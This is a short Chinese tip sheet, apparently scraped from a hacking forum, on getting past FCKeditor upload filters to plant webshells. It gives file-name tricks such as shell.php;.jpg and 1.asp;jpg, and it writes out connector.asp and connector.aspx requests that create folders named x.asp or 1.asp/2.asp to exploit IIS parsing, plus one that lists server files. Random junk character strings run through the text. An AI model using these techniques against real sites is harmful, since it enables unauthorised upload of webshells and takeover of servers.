很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
; q( v" e2 Q3 f# w9 |* f. c0 ]
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。, d9 Y( S+ Y* U* e: z% J+ j
$ S, F, F. v$ |9 E继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。, E- N! O6 G. |& E0 D
* ?' A+ k! r1 A$ o
突破建立文件夹:
r1 R5 G( R9 w/ f7 N7 V# P4 u; c- V5 O0 J R
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
/ v" h* H) u3 l T
4 Y: @2 ?) ?0 ^参数:. a+ U7 J7 D5 T9 W, K
" p' N) X, U( c当前目录名:CurrentFolder=/qing.asp4 i. W$ T' X8 m& C: B" g
% w8 w/ m- [2 f* F. N7 _0 B& K1 D
新的目录名:NewFolderName=x.asp* \! t/ | }1 P1 T
* |1 U, b( ]: ?$ U( V' u0 M其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……5 m" [5 l1 e) I& H; u
2 n0 F# G6 q2 H3 X6 p2 h; `4 x那么 x.asp 就已经建立生成了,此方法百试百灵!
5 ^% Y' w/ i& K8 N- d8 |3 p2 U1 }
) @5 E/ L) B! L5 j* ?% k+ Y0 @新建文件夹参数 x.asp,基本都能搞定。: `" [/ p& R8 }
8 k: d. ?1 Z) Q4 L. M
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建. I1 _/ z. v: C8 Y9 D m
, I+ J" p- \& D8 w# Q% D0 Oaspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
9 `. w1 w, F+ H% p
$ b2 f& K3 T% n2 D. p, I* V获取文件列表
9 d4 e9 @0 r2 P9 c% Q- @+ ^ aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F/ H+ S. c( C+ i8 E, W5 D( P( ~/ w) l
% A% s2 L3 @/ B7 C( m2 y& B, |; T
|